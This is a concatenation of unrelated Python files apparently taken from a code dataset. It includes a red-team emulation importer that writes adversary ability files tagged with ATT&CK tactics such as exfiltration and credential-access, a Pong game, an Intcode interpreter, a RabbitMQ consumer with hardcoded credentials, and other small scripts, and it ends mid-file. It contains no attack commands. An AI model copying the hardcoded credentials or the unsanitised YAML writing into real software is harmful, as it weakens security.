'test': header.index('test'),\n 'technique_id': header.index('technique_id'),\n 'technique_name': header.index('technique_name'),\n 'tactic': header.index('tactic'),\n 'cleanup': header.index('cleanup'),\n 'platform': header.index('platform'),\n 'payload': header.index('payload'),\n 'status': 1\n }\n if 'ability_id' in header:\n mapper['ability_id'] = header.index('ability_id')\n else:\n return mapper\n except Exception as err:\n print('Failed' + str(err))\n return {'status': 0}\n\ntactics = ['collection', 'command-and-control', 'credential-access', 'defense-evasion', 'discovery', 'execution', 'exfiltration', 'impact', 'initial-access', 'lateral-movement', 'multiple', 'persistence', 'privilege-escalation', 'technical-information-gathering']\n\ndef write_new_adversary(category, os_name, value, path):\n \n filler = max(0, 25 - len(value) - 1)\n filename_adv = 'SEC#'+os_name[:4] + '-' + value[:24] + '-' + filler*'x'\n counter = 1\n with open(path + 'data/adversaries/' + filename_adv + '.yml', 'w') as f:\n f.write('---\\n\\nid: ' + filename_adv + '\\n')\n f.write('name: SEC adversary ' + os_name + ' - ' + category + ' - ' + value + '\\n')\n f.write('description: SEC adversary including all abilities for which ' +category + ' starts with ' + value + '\\n')\n f.write('visible: 1\\n')\n f.write('phases:\\n')\n if not os_name == '_all':\n if category == 'all':\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yml') or filename.endswith('.yaml'):\n try:\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line and not os_name+':' in line:\n line = reading.readline()\n if line:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n except Exception as err:\n print(str(err) + ' ' + str(counter))\n\n else:\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yaml') or filename.endswith('.yml'):\n try:\n os_b = False\n value_b = False\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line:\n while line and not category in line and not os_name + ':' in line:\n line = reading.readline()\n if line:\n if os_name + ':' in line:\n os_b = True\n line = reading.readline()\n elif value in line:\n value_b = True\n line = reading.readline()\n elif ': |' in line:\n line = reading.readline()\n if value in line:\n value_b = True\n line = reading.readline()\n else:\n line = reading.readline()\n if os_b and value_b:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n \n except Exception as err:\n print(str(err) + ' ' + str(counter))\n else:\n if category == 'all':\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yml') or filename.endswith('.yaml'):\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename)[:-4] + '\\n')\n counter += 1\n else:\n for subdir, dirs, files in os.walk(path + 'data/abilities'):\n for filename in files:\n if filename.endswith('.yaml') or filename.endswith('.yml'):\n try:\n with open (subdir + '/' + filename) as reading:\n line = reading.readline()\n while line:\n while line and not category in line:\n line = reading.readline()\n if line:\n if value in line:\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n line = None\n elif value in reading.readline():\n f.write(' ' + str(counter) + ':\\n')\n f.write(' - ' + str(filename[:-4] + '\\n'))\n counter += 1\n line = None\n else:\n line = reading.readline()\n except Exception as err:\n print(str(err) + ' ' + str(counter))\n\n \n if counter == 1:\n os.remove(path + 'data/adversaries/' + filename_adv + '.yml')\n \n\n return counter\n\n\nclass ImporterService:\n\n def __init__(self, services):\n self.services = services\n self.auth_svc = self.services.get('auth_svc')\n self.data_svc = self.services.get('data_svc')\n self.rest_svc = self.services.get('rest_svc')\n self.stockpile_path = os.path.dirname(os.path.abspath(__file__)).split('importer', 1)[0] + 'stockpile/'\n\n @template('importer.html')\n async def splash(self, request):\n await self.auth_svc.check_permissions(request)\n adversaries = [a.display for a in await self.data_svc.locate('adversaries')]\n categories = ['id', 'name', 'description', 'tactic', 'attack_id', 'command', 'cleanup', 'payload']\n return dict(adversaries=sorted(adversaries, key=lambda a: a['name']),categories=categories)\n\n @check_authorization\n async def generateAdv(self, request):\n \n args = json.loads(await request.read())\n if args['category'] == 'tactic' and args['term'] == '':\n category = 'tactic'\n # Create adversary for each tactic for each os\n for value in tactics:\n write_new_adversary(category, 'windows', value, self.stockpile_path)\n write_new_adversary(category, 'linux', value, self.stockpile_path)\n write_new_adversary(category, 'darwin', value, self.stockpile_path)\n # Create adversary with all (Stable) tests for each os\n write_new_adversary('description', 'windows', '(Stable)', self.stockpile_path)\n write_new_adversary('description', 'linux', '(Stable)', self.stockpile_path)\n write_new_adversary('description', 'darwin', '(Stable)', self.stockpile_path)\n return web.json_response({\"status\":\"successful\"})\n else:\n write_new_adversary(args['category'], '_all', args['term'], self.stockpile_path)\n return web.json_response({\"Status\":\"successful\"})\n\n @check_authorization\n async def create_ability_from_csv(self, request):\n \"\"\"\n Takes a layer file and generates an adversary that matches the selected tactics and techniques.\n Adversary will be divided into phases by tactic\n :param request:\n :return:\n \"\"\"\n\n try:\n csv_file = await self.read_csv(request)\n except json.decoder.JSONDecodeError:\n return web.HTTPBadRequest()\n\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n mapping = sanity_checks(next(csv_file))\n if mapping['status'] == 0:\n return web.HTTPBadRequest()\n \n counter = 0\n print('mapping done')\n for ability in csv_file:\n print(ability)\n \n if not len(ability[mapping['technique_id']]) == 5 or not ability[mapping['technique_id']].startswith('T'):\n return web.HTTPBadRequest()\n if not ability[mapping['tactic']] in tactics:\n return web.HTTPBadRequest()\n \n if 'ability_id' in mapping.keys() and not ability[mapping['ability_id']] == '':\n ability_id = ability[mapping['ability_id']]\n print('id in test')\n else:\n ability_id = 'SEC' + ability[mapping['platform']][:3] + 'v1-' + ability[mapping['tactic']][:4] + '-' + ability[mapping['technique_id']][1:] + '-'+ str(counter).zfill(4)+'-' + generate_time_stamp()\n print('id not in test') \n\n file_name = self.stockpile_path + 'data/abilities/' + ability[mapping['tactic']] + '/' + ability_id + '.yml'\n try:\n with open(file_name, 'w') as yaml:\n yaml.write('---\\n\\n- id: ' + ability_id + '\\n')\n yaml.write(' name: ' + ability[mapping['name']] + '\\n')\n yaml.write(' description: |\\n ' + ability[mapping['description']] + '\\n')\n yaml.write(' tactic: ' + ability[mapping['tactic']] + '\\n')\n yaml.write(' technique:\\n')\n yaml.write(' attack_id: ' + ability[mapping['technique_id']] + '\\n')\n yaml.write(' name: ' + ability[mapping['technique_name']] + '\\n')\n yaml.write(' platforms:\\n')\n yaml.write(' ' + ability[mapping['platform']] + \":\\n\")\n yaml.write(' ' + ability[mapping['executor']] + ':\\n')\n yaml.write(' command: |\\n')\n yaml.write(' ' + ability[mapping['test']].replace('€','\\n ') + '\\n')\n if len(ability[mapping['cleanup']]) > 0:\n yaml.write(' cleanup: |\\n')\n yaml.write(' ' + ability[mapping['cleanup']].replace('€', '\\n ') + '\\n')\n if len(ability[mapping['payload']]) > 0:\n yaml.write(' payload: ' + ability[mapping['payload']]) \n except Exception as err:\n return web.HTTPBadRequest()\n counter += 1 \n return web.json_response('true') \n","sub_path":"plugins/importer/app/importer_svc.py","file_name":"importer_svc.py","file_ext":"py","file_size_in_byte":12424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"612832651","text":"import turtle\nimport os\nfrom time import sleep\n\n\n# Settings\n\n# Score needed to win\nwinscore = 1\n# Player Names\nplayername_a = (\"Spieler 1\")\nplayername_b = (\"Spieler 2\")\n# Paddle Sizes\npaddle_size = 60\n# Float digits\nflt_dgt = 3\n# Speed added after Point\npt_speed = 0.05\n# Speed added after Paddle touch\ntch_speed = 0.01\n# Ball Speed\n\nball_speed = 0.1\n\nwn = turtle.Screen()\nwn.title(\"Python Pong\")\nwn.bgcolor(\"black\")\nwn.setup(width=800,height=600)\nwn.tracer(0)\n\n# Paddle A\npaddle_a = turtle.Turtle()\npaddle_a.speed(0)\npaddle_a.shape(\"square\")\npaddle_a.color(\"white\")\npaddle_a.shapesize(stretch_wid=(paddle_size / 10),stretch_len=1)\npaddle_a.penup()\npaddle_a.goto(-350,0)\n\n# Paddle B\npaddle_b = turtle.Turtle()\npaddle_b.speed(0)\npaddle_b.shape(\"square\")\npaddle_b.color(\"white\")\npaddle_b.shapesize(stretch_wid=(paddle_size / 10),stretch_len=1)\npaddle_b.penup()\npaddle_b.goto(350,0)\n\n# Ball\nball = turtle.Turtle()\nball.speed(0)\nball.shape(\"circle\")\nball.color(\"white\")\nball.shapesize(stretch_wid=1,stretch_len=1)\nball.penup()\nball.goto(0,0)\nbspeed = 0.1\nball.dx = ball_speed\nball.dy = ball_speed\n\n\n\n# Scoreboard\nscore_a = 0\nscore_b = 0\npen = turtle.Turtle()\npen.speed(0)\npen.color(\"white\")\npen.penup()\npen.hideturtle()\npen.goto(0,240)\npen.write(\"{}: 0 | {}: 0 \\n Speed : 0.1\".format(playername_a, playername_b), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n#punkt fuer b\nlos_a = turtle.Turtle()\nlos_a.speed(0)\nlos_a.color(\"white\")\nlos_a.penup()\nlos_a.goto(0,0)\nlos_a.shape(\"square\")\nlos_a.shapesize(stretch_wid=100, stretch_len=100)\n\n#punkt fuer a\nlos_b = turtle.Turtle()\nlos_b.speed(0)\nlos_b.color(\"white\")\nlos_b.penup()\nlos_b.goto(0,100)\nlos_b.shape(\"square\")\nlos_b.shapesize(stretch_wid=100, stretch_len=100)\n\n#a gewonnen\nwin_a = turtle.Turtle()\nwin_a.speed(0)\nwin_a.color(\"white\")\nwin_a.penup()\nwin_a.goto(0,0)\nwin_a.shape(\"square\")\nwin_a.shapesize(stretch_wid=100, stretch_len=100)\n\n# b gewonnen\nwin_b = turtle.Turtle()\nwin_b.speed(0)\nwin_b.color(\"white\")\nwin_b.penup()\nwin_b.goto(0,0)\nwin_b.shape(\"square\")\nwin_b.shapesize(stretch_wid=100, stretch_len=100)\n\n\n# Funktion\ndef paddle_a_up():\n\tif paddle_a.ycor() < (300 - paddle_size):\n\t\ty = paddle_a.ycor()\n\t\ty += 20\n\t\tpaddle_a.sety(y)\n\ndef paddle_a_down():\n\tif paddle_a.ycor() > (-300 + paddle_size):\n\t\ty = paddle_a.ycor()\n\t\ty -= 20\n\t\tpaddle_a.sety(y)\n\ndef paddle_b_up():\n\tif paddle_b.ycor() < (300 - paddle_size):\n\t\ty = paddle_b.ycor()\n\t\ty += 20\n\t\tpaddle_b.sety(y)\n\ndef paddle_b_down():\n\tif paddle_b.ycor() > (-300 + paddle_size):\n\t\ty = paddle_b.ycor()\n\t\ty -= 20\n\t\tpaddle_b.sety(y)\n\ndef a_los():\n\tpaddle_b.sety(0)\n\tpaddle_a.sety(0)\n\tfor i in range(3):\n\t\tlos_a.showturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\t\tlos_a.hideturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\n\ndef b_los():\n\tpaddle_b.sety(0)\n\tpaddle_a.sety(0)\n\tfor i in range(3):\n\t\tlos_b.showturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\t\tlos_b.hideturtle()\n\t\twn.update()\n\t\tsleep(0.1)\n\ndef win():\n\tif score_a == winscore:\n\t\twin_a.showturtle()\n\t\twtxt_a = turtle.Turtle()\n\t\twtxt_a.speed(0)\n\t\twtxt_a.color(\"black\")\n\t\twtxt_a.penup()\n\t\twtxt_a.hideturtle()\n\t\twtxt_a.goto(0,0)\n\t\twtxt_a.write(\"{} has won!\".format(playername_a), align=\"center\",font=(\"Courier\",24,\"bold\"))\n\t\twtxt_a.shape(\"square\")\n\t\twtxt_a.shapesize(stretch_wid=30,stretch_len=30)\n\n\telif score_b == winscore:\n\t\twin_b.showturtle()\n\t\twtxt_b = turtle.Turtle()\n\t\twtxt_b.speed(0)\n\t\twtxt_b.color(\"black\")\n\t\twtxt_b.penup()\n\t\twtxt_b.hideturtle()\n\t\twtxt_b.write(\"{} has won!\".format(playername_b), align=\"center\",font=(\"Courier\",24,\"bold\"))\n\t\twtxt_b.goto(0,0)\n\t\twtxt_b.shape(\"square\")\n\t\twtxt_b.shapesize(stretch_wid=30,stretch_len=30)\n\telse:\n\t\tdraw = turtle.Turtle\n\t\tdraw.speed(0)\n\t\tdraw.color(\"Black\")\n\t\tdraw.penup()\n\t\tdraw.hideturtle()\n\t\tdraw.write(\"Draw!\")\n\n\n#Keyboard Binding\nwn.listen()\nwn.onkeypress(paddle_a_up,\"w\")\nwn.onkeypress(paddle_a_down,\"s\")\n\nwn.onkeypress(paddle_b_up,\"Up\")\nwn.onkeypress(paddle_b_down,\"Down\")\n\n# Main game loop\nwhile True :\n\n\tif score_a < winscore and score_b < winscore:\n\t\t\n\t\twin_a.hideturtle()\n\t\twin_b.hideturtle()\n\t\tspeed = round(bspeed, flt_dgt)\n\t\tlos_a.hideturtle()\n\t\tlos_b.hideturtle()\n\n\t\twn.update()\n\t\t#Move the ball\n\t\tball.setx(ball.xcor() + ball.dx)\n\t\tball.sety(ball.ycor() + ball.dy)\n\n\t\t# Border checking\n\n\t\t#oben\n\t\tif ball.ycor() > 290:\n\t\t\tball.sety(290)\n\t\t\tball.dy *= -1\n\t\t\n\t\t#unten\n\t\tif ball.ycor() < -290:\n\t\t\tball.sety(-290)\n\t\t\tball.dy *= -1\n\t\t\n\t\t#rechte seite\n\t\tif ball.xcor() > 390:\n\t\t\tball.goto(0,0)\n\t\t\tball.dx *= -1\n\t\t\tscore_a += 1\n\t\t\tb_los()\n\t\t\tbspeed += pt_speed\n\t\t\tpen.clear()\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b, score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\t#linke seite\n\t\tif ball.xcor() < -390:\n\t\t\tball.goto(0,0)\n\t\t\tball.dx *= -1\n\t\t\tscore_b += 1\n\t\t\ta_los()\n\t\t\tbspeed += pt_speed\n\t\t\tpen.clear()\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\t#Paddle Collision\n\t\tif ball.xcor() > 340 and (ball.xcor() < 350) and (ball.ycor() < paddle_b.ycor() + paddle_size and ball.ycor() > paddle_b.ycor() - paddle_size):\n\t\t\tball.dx *= -1\n\t\t\tball.setx(340)\n\t\t\tpen.clear()\n\t\t\tbspeed += tch_speed\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\n\t\tif ball.xcor() < -340 and (ball.xcor() > -350) and (ball.ycor() < paddle_a.ycor() + paddle_size and ball.ycor() > paddle_a.ycor() - paddle_size):\n\t\t\tball.dx *= -1\n\t\t\tball.setx(-340)\n\t\t\tpen.clear()\n\t\t\tbspeed += tch_speed\n\t\t\tpen.write(\"{}: {} | {}: {} \\n Speed : {} \".format(playername_a, score_a,playername_b,score_b, speed), align=\"center\", font=(\"Courier\",16,\"bold\"))\n\telse :\n\t\twin()\n\t\twn.update()\n\t\t\n# Made by Sturm2002 / Sturm2002\n# Somewhere end 2019 ","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"32784360","text":"# -*- coding: utf-8 -*-\n\nfrom setuptools import setup\n# from setuptools import find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='rocket-fuel-sdk-rest',\n version='0.2.0',\n description='ExactTarget REST API Wrapper',\n long_description=readme,\n author='JBA',\n author_email='lex@jbadigital.com.com',\n url='https://github.com/jbadigital/rocket-fuel-sdk-rest',\n license=license,\n install_requires=['requests'],\n packages=['rocket_fuel_sdk_rest']\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"34747084","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom gpiozero import LED\nfrom time import sleep\n\nLED_R_PIN = 17 # Red\nLED_Y_PIN = 27 # Yellow\nLED_G_PIN = 22 # Green\nWAIT_TIME = 3\n\nled_list = [\n LED(LED_R_PIN),\n LED(LED_Y_PIN),\n LED(LED_G_PIN)\n]\nfor led in led_list:\n led.on()\nsleep(WAIT_TIME)\nfor led in led_list:\n led.off()\n\n","sub_path":"py12/04/led_list2.py","file_name":"led_list2.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"170743143","text":"import sys\n\ndef extend(mode, memory, ptr):\n m = int(mode)\n if m == 1:\n return\n\n if (ptr >= len(memory)):\n diff = ptr - len(memory) + 1\n extension = ['0'] * diff\n memory.extend(extension) \n \ndef set_val(ptr, val, relative_base = None, mode = None):\n m = int(mode) if mode != None else 0\n addr = int(memory[ptr])\n\n if m == 2:\n addr += relative_base\n \n extend(m, memory, addr) \n memory[addr] = val\n\ndef get_val(mode, op, i, relative_base):\n m = int(mode)\n extend(mode, op, i)\n addr = int(op[i])\n \n if m == 0:\n return int(op[addr]) \n elif m == 2:\n return int(op[relative_base + addr]) \n \n return addr\n\nif __name__ == \"__main__\": \n f = open(sys.argv[1])\n memory = f.read().split(',')\n f.close()\n \n ptr = 0\n relative_base = 0\n while ptr < len(memory): \n instruction = int(memory[ptr][-2:]) if len(memory[ptr]) > 1 else int(memory[ptr]) \n mode1 = memory[ptr][-3:-2] if len(memory[ptr]) > 2 else 0\n mode2 = memory[ptr][-4:-3] if len(memory[ptr]) > 3 else 0\n mode3 = memory[ptr][0] if len(memory[ptr]) > 4 else 0 \n\n if instruction == 1: \n val = str(get_val(mode1, memory, ptr + 1, relative_base) + get_val(mode2, memory, ptr + 2, relative_base))\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4 \n elif instruction == 2: \n val = str(get_val(mode1, memory, ptr + 1, relative_base) * get_val(mode2, memory, ptr + 2, relative_base))\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4\n elif instruction == 3:\n val = input('Input: ')\n set_val(ptr + 1, str(val), relative_base, mode1)\n ptr += 2\n elif instruction == 4:\n print('Output: ', get_val(mode1, memory, ptr + 1, relative_base)) \n ptr += 2\n elif instruction == 5:\n ptr = get_val(mode2, memory, ptr + 2, relative_base) if get_val(mode1, memory, ptr + 1, relative_base) != 0 else ptr + 3\n elif instruction == 6:\n ptr = get_val(mode2, memory, ptr + 2, relative_base) if get_val(mode1, memory, ptr + 1, relative_base) == 0 else ptr + 3\n elif instruction == 7:\n val = '1' if get_val(mode1, memory, ptr + 1, relative_base) < get_val(mode2, memory, ptr + 2, relative_base) else '0'\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4 \n elif instruction == 8:\n val = '1' if get_val(mode1, memory, ptr + 1, relative_base) == get_val(mode2, memory, ptr + 2, relative_base) else '0'\n set_val(ptr + 3, val, relative_base, mode3)\n ptr += 4\n elif instruction == 9:\n relative_base += int(get_val(mode1, memory, ptr + 1, relative_base))\n ptr += 2\n elif instruction == 99:\n break","sub_path":"Day9/Day9_Part2.py","file_name":"Day9_Part2.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"182719733","text":"import pika\n\ncredentials = pika.PlainCredentials('user', 'user')\nconnection = pika.BlockingConnection(pika.ConnectionParameters('10.20.1.54', 30672, '/', credentials))\n\n\ndef on_message(channel, method_frame, header_frame, body):\n print(method_frame.delivery_tag)\n print(body)\n print()\n channel.basic_ack(delivery_tag=method_frame.delivery_tag)\n\nchannel = connection.channel()\nchannel.basic_consume('hello', on_message)\n\ntry:\n channel.start_consuming()\nexcept KeyboardInterrupt:\n channel.stop_consuming()\nconnection.close()","sub_path":"data-preprocess/test-code/mq_test.py","file_name":"mq_test.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"627673328","text":"\r\nfrom jq_include import *\r\nfrom jq_data_capi import *\r\nfrom jq_callback_capi import *\r\nfrom jq_playback_capi import *\r\nfrom jq_subscriber_capi import *\r\nimport time\r\nimport pandas as pd\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n start_date='2016-02-01'\r\n end_date='2019-12-31'\r\n\r\n start_time=' 9:30:00'\r\n end_time=' 15:00:00'\r\n\r\n stock_code='000001.XSHE'\r\n\r\n new_ebq = jq_data()\r\n ip_str = \"10.84.137.198\"\r\n # ip = bytes(ip_str, encoding = \"utf-8\")\r\n result = new_ebq.connect(ip_str, 7000)\r\n l_result = new_ebq.login(\"13100000002\", \"gdzq12345\")\r\n\r\n day_ls=new_ebq.get_trade_days(start_date,end_date)\r\n\r\n # test_day='2016-05-30'\r\n # tick=len(new_ebq.get_stock_ticks(stock_code,test_day+start_time,test_day+end_time))\r\n # print(tick)\r\n\r\n\r\n # para=[]\r\n # for d in day_ls:\r\n # day=d.decode()\r\n # tick=len(new_ebq.get_stock_ticks(stock_code,day+start_time,day+end_time))\r\n # #trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n # #order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n # #para.append([day,tick,trade,order])\r\n # para.append([day, tick])\r\n # print(day)\r\n # print(tick)\r\n # paraDF=pd.DataFrame(para,columns=['date','tick'])\r\n # paraDF.to_csv('flag_tick.csv')\r\n\r\n\r\n # para = []\r\n # for d in day_ls:\r\n # day = d.decode()\r\n # #tick = len(new_ebq.get_stock_ticks(stock_code, day + start_time, day + end_time))\r\n # trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n # # order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n # # para.append([day,tick,trade,order])\r\n # para.append([day, trade])\r\n # print(day)\r\n # print(trade)\r\n # paraDF = pd.DataFrame(para, columns=['date', 'trade'])\r\n # paraDF.to_csv('flag_trade.csv')\r\n #\r\n\r\n\r\n para = []\r\n for d in day_ls:\r\n day = d.decode()\r\n #tick = len(new_ebq.get_stock_ticks(stock_code, day + start_time, day + end_time))\r\n #trade=len(new_ebq.get_trades(stock_code,day+start_time,day+end_time))\r\n try:\r\n order=len(new_ebq.get_orders(stock_code,day+start_time,day+end_time))\r\n except:\r\n order=0\r\n\r\n # para.append([day,tick,trade,order])\r\n para.append([day, order])\r\n print(day)\r\n print(order)\r\n paraDF = pd.DataFrame(para, columns=['date', 'order'])\r\n paraDF.to_csv('flag_order.csv')\r\n","sub_path":"test0807.py","file_name":"test0807.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"39620288","text":"# Developed by Amresh Ranjan.\n\nfrom tkinter import *\nfrom tkinter.ttk import *\n\nfrom time import strftime\n\nroot = Tk()\n\nroot.title('Digital Clock using Tkinter GUI')\n\ndef clock():\n\ttick = strftime('%H:%M:%S %p')\n\n\tlabel.config(text =tick)\n\n\tlabel.after(1000, clock)\n\nlabel = Label(root, font =('sans', 90), background = 'black', foreground = 'yellow')\n\nlabel.pack(anchor= 'center')\n\nclock()\nmainloop()\n","sub_path":"Clock Using GUI.py","file_name":"Clock Using GUI.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"61481906","text":"parking_slots = {}\n\n\ndef create_parking_slots(number_of_slots):\n \"\"\"This method creates the framework for the parking area. Based on the number_of_slots space is created for the same number.\n\n Args:\n number_of_slots (str): Initially str, later converted into int, will create 'n' number of spaces in the parking area.\n\n Returns:\n Boolean: Returns True if space is created, else False.\n \"\"\"\n if (number_of_slots is None or number_of_slots == 0):\n print(f\"Cannot create parking slots. Please try again.\")\n return False\n number_of_slots = int(number_of_slots)\n if (isinstance(number_of_slots, int) and number_of_slots > 0):\n for i in range(number_of_slots):\n parking_slots[i + 1] = None\n print(f\"Created Parking of {number_of_slots} slots.\")\n return True\n else:\n print(\n f\"Cannot create slots with {number_of_slots} as input. Please try again. Maybe with a valid number?\"\n )\n return False\n\n\ndef park_vechile(vehicle_id, driver_age):\n \"\"\"Allocates a slot that is closest to the entrance, based on the number plate of the vehicle and drivers age.\n\n Args:\n vehicle_id (str): Registration plate / number plate of the vehicle that needs to be parked on to a slot in parking area.\n driver_age (str): Age of the driver who parks. \n\n Returns:\n Boolean: Return True if the parking space is alloted, else False.\n \"\"\"\n if (vehicle_id is None or driver_age is None or int(driver_age) <= 0):\n print(\n f\"Cannot add vehicle : {vehicle_id} with drivers age : {driver_age}. Make sure you have entered valid age and vehicle id.\"\n )\n return False\n driver_age = int(driver_age)\n if (16 > driver_age and driver_age > 120):\n print(\n f\"The drivers age is suspicious. Please verify the vehicle. The record has been saved anyways.\"\n )\n is_entry_successful = False\n vehicle_ids = []\n for slot_number, details in parking_slots.items():\n if (details is None):\n if (vehicle_id in vehicle_ids):\n print(\n f\"The vehicle : {vehicle_id} is already present in the parking area. You might want to recheck.\"\n )\n return False\n else:\n parking_slots[slot_number] = {\n \"vehicle_id\": vehicle_id,\n \"driver_age\": driver_age\n }\n is_entry_successful = True\n print(\n f\"Vehicle number : {vehicle_id} has been granted slot number {slot_number}.\"\n )\n break\n else:\n vehicle_ids.append(details[\"vehicle_id\"])\n if (not is_entry_successful):\n print(\n f\"Sorry, we cannot grant entrance to {vehicle_id}. The parking lot is full.\"\n )\n return False\n return True\n\n\ndef get_vehicle_ids_by_drivers_age(drivers_age):\n \"\"\"Given the age of the driver, return all the number plates of the vehicle which has drivers of that age.\n\n Args:\n drivers_age (str -> int): Age of the driver\n\n Returns:\n list: Returns list of number plates having drivers with same age. If not driver with that age exists then empty list is returned.\n \"\"\"\n vehicle_ids = []\n if (drivers_age is None):\n return vehicle_ids\n drivers_age = int(drivers_age)\n for slot_number, details in parking_slots.items():\n if (details is not None and int(details[\"driver_age\"]) == drivers_age):\n vehicle_ids.append(details[\"vehicle_id\"])\n if (len(vehicle_ids) > 0):\n print(vehicle_ids)\n else:\n print(f\"No records found for driver age : {drivers_age}\")\n return vehicle_ids\n\n\ndef get_slot_number_by_vehicle_id(vehicle_id):\n \"\"\"Given the number plate of the vehicle find out which slot the vehicle is parked at.\n\n Args:\n vehicle_id (str): Number plate of the vehicle\n\n Returns:\n int: Returns the slot number on which the vehicle is parked at. If not present returns None.\n \"\"\"\n for slot_number, details in parking_slots.items():\n if (details is not None and details[\"vehicle_id\"] == vehicle_id):\n print(f\"Vehicle : {vehicle_id} is present in slot : {slot_number}\")\n return slot_number\n print(f\"Vehicle : {vehicle_id} not found in our parking facility.\")\n return None\n\n\ndef get_slot_number_by_drivers_age(drivers_age):\n \"\"\"Given the drivers age, this method returns the slot numbers for which drivers of that age is present.\n\n Args:\n drivers_age (str -> int): Age of the driver that was used to enter when parking.\n\n Returns:\n list: A list of slot numbers for which drivers of that age is present.\n \"\"\"\n slot_numbers_for_age = []\n if (drivers_age is None):\n return slot_numbers_for_age\n drivers_age = int(drivers_age)\n for slot_number, details in parking_slots.items():\n if (details is not None and int(details[\"driver_age\"]) == drivers_age):\n slot_numbers_for_age.append(slot_number)\n if (len(slot_numbers_for_age) > 0):\n print(slot_numbers_for_age)\n else:\n print(f\"No records found for driver age : {drivers_age}\")\n return slot_numbers_for_age\n\n\ndef clear_parking_space(slot_number):\n \"\"\"Removes the given slot number, marking it as empty and gives the vehicle that just left.\n\n Args:\n slot_number (str -> int): Returns the slot number that was emptied.\n \"\"\"\n slot_number = int(slot_number)\n if (parking_slots[slot_number] is None):\n print(f\"Parking slot number : {slot_number} is already vacant.\")\n return False\n else:\n vehicle_id = parking_slots[slot_number][\"vehicle_id\"]\n parking_slots[slot_number] = None\n print(\n f\"Vehicle_id : {vehicle_id} has left the parking area. Slot number : {slot_number} is vacant now.\"\n )\n return True\n\n\ndef get_parking_slot():\n \"\"\"Returns the parking slot object\n\n Returns:\n dict: Parking Slot Object\n \"\"\"\n return parking_slots\n","sub_path":"utilities/core_logic.py","file_name":"core_logic.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"311397205","text":"# The string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\n# P A H N\n# A P L S I I G\n# Y I R\n\n# 2 rows example:\n# A C E\n# B D\n\n# 4 rows example:\n# A G M\n# B F H L N\n# C E I K O\n# D J\n\n# And then read line by line: \"PAHNAPLSIIGYIR\"\n# Write the code that will take a string and make this conversion given a number of rows:\n\n# string convert(string text, int nRows);\n# convert(\"PAYPALISHIRING\", 3) should return \"PAHNAPLSIIGYIR\".\n\n# Basic idea: fill 2 dimension array, if numRows > 2, then skip `oddCol & (first or last row)`; when oddCol, reverse fill order in that col\nclass Solution(object):\n def convert(self, s, numRows):\n \"\"\"\n :type s: str\n :type numRows: int\n :rtype: str\n \"\"\"\n if s == None or len(s) <= numRows:\n return s\n else:\n ar = []\n for i in range(numRows):\n ar.append([])\n\n # current cursor index of `s`\n sIndex = 0\n # current global travel index\n travel = 0\n while sIndex < len(s):\n col = travel // numRows\n row = travel % numRows\n isOddCol = col % 2 == 1\n\n if numRows <= 2:\n # if numRows less or equal than 2, then don't skip any element\n isSkip = False\n else:\n # if numRows > 2, then skip first and last row in odd col\n isSkip = (row == 0 or row == numRows - 1) and isOddCol\n\n if 